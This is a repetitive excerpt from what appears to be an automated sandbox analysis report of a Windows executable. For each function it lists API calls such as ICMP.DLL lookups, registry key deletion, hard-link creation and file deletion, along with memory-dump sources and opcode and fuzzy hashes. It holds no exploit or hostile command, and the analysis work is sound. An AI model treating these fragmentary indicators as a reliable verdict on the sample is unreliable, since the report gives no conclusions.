                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                • String ID: ICMP.DLL$IcmpCloseHandle
                                                                                                                                                                                                                • API String ID: 2574300362-3530519716
                                                                                                                                                                                                                • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                                                                                                                                                                • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                                                                                                                                                                                                Function 004312FE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                • String ID: ICMP.DLL$IcmpCreateFile
                                                                                                                                                                                                                • API String ID: 2574300362-275556492
                                                                                                                                                                                                                • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                                                                                                                                                                • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                                                                                                                                                                                                Function 0043129A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                • String ID: ICMP.DLL$IcmpSendEcho
                                                                                                                                                                                                                • API String ID: 2574300362-58917771
                                                                                                                                                                                                                • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                                                                                                                                                                • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                                                                                                                                                                • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                                                                                                                                                                                                                Function 00430C7F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                • API String ID: 2574300362-4033151799
                                                                                                                                                                                                                • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                                                                                                                                                                • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                                                                                                                                                                                                Function 00479500 Relevance: 6.2, APIs: 4, Instructions: 162memoryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 0047950F
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                                                                                                                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00479650
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Variant$AllocClearCopyInitString
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2808897238-0
                                                                                                                                                                                                                • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                                                                                                                                                                • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                                                                                                                                                                                                Function 0046993E Relevance: 6.1, APIs: 4, Instructions: 149windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                                                                                                                                                                                                • __itow.LIBCMT ref: 004699CD
                                                                                                                                                                                                                  • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                                                                                                                                                                                                • __itow.LIBCMT ref: 00469A97
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: MessageSend$__itow
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3379773720-0
                                                                                                                                                                                                                • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                                                                                                                                                                • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                                                                                                                                                                                                                Function 004499DB Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00449A4A
                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00449A80
                                                                                                                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3880355969-0
                                                                                                                                                                                                                • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                                                                                                                                                                • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                                                                                                                                                                                                Function 0041415F Relevance: 6.1, APIs: 4, Instructions: 130COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2782032738-0
                                                                                                                                                                                                                • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                                                                                                                                                                                • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                                                                                                                                                                                                Function 00441672 Relevance: 6.1, APIs: 4, Instructions: 116windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00441722
                                                                                                                                                                                                                • PtInRect.USER32(?,?,?), ref: 00441734
                                                                                                                                                                                                                • MessageBeep.USER32(00000000), ref: 004417AD
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1352109105-0
                                                                                                                                                                                                                • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                                                                                                                                                                • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                                                                                                                                                                                                • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                                                                                                                                                                                                Function 0045D1AF Relevance: 6.1, APIs: 4, Instructions: 103fileCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                                                                                                                                                                                                • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                                                                                                                                                                                                • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3321077145-0
                                                                                                                                                                                                                • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                                                                                                                                                                • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                                                                                                                                                                                                                Function 0042083F Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                                                                                                                                                                                                • __isleadbyte_l.LIBCMT ref: 004208A6
                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3058430110-0
                                                                                                                                                                                                                • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                                                                                                                                                                • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                                                                                                                                                                                                Function 0045039B Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetParent.USER32(?), ref: 004503C8
                                                                                                                                                                                                                • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                                                                                                                                                                                                • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                                                                                                                                                                                                • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Proc$Parent
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2351499541-0
                                                                                                                                                                                                                • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                                                                                                                                                                • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                                                                                                                                                                                                                Function 00442A83 Relevance: 6.1, APIs: 4, Instructions: 87windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
